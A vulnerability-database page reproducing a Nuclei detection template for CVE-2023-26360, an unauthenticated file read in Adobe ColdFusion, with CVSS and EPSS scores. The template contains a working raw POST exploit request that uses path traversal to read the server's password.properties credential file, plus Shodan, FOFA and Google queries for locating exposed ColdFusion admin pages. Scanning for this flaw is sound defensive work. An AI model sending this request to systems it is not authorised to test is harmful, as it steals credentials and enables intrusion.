Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-26360
HistoryMay 09, 2023 - 9:33 a.m.

Unauthenticated File Read Adobe ColdFusion

2023-05-0909:33:18
ProjectDiscovery
github.com
62
cve2023
packetstorm
adobe
coldfusion
lfi
kev

CVSS3

8.6

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

AI Score

8.7

Confidence

High

EPSS

0.965

Percentile

99.6%

Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier
id: CVE-2023-26360

info:
  name: Unauthenticated File Read Adobe ColdFusion
  author: DhiyaneshDK
  severity: high
  description: |
    Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information stored on the server.
  remediation: |
    Apply the necessary security patches or updates provided by Adobe to fix the vulnerability.
  reference:
    - https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26360
    - https://helpx.adobe.com/security/products/coldfusion/apsb23-25.html
    - http://packetstormsecurity.com/files/172079/Adobe-ColdFusion-Unauthenticated-Remote-Code-Execution.html
    - https://github.com/Ostorlab/KEV
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2023-26360
    cwe-id: CWE-284
    epss-score: 0.96298
    epss-percentile: 0.99537
    cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: adobe
    product: coldfusion
    shodan-query:
      - http.component:"Adobe ColdFusion"
      - http.component:"adobe coldfusion"
      - http.title:"coldfusion administrator login"
      - cpe:"cpe:2.3:a:adobe:coldfusion"
    fofa-query:
      - title="coldfusion administrator login"
      - app="adobe-coldfusion"
    google-query: intitle:"coldfusion administrator login"
  tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev

http:
  - raw:
      - |
        POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "password="
          - "encrypted=true"
          - "adobe"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"
# digest: 4a0a00473045022049ae0d61b6974e768810d21126c80845b1073b3d24624d059acad02e830ca5630221008a177ec08fa27677755d03a81905a317a6c9abb094e4b8edc92c6194fb7a2992:922c64590222798bb761d5b6d8e72950

CVSS3

8.6

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

AI Score

8.7

Confidence

High

EPSS

0.965

Percentile

99.6%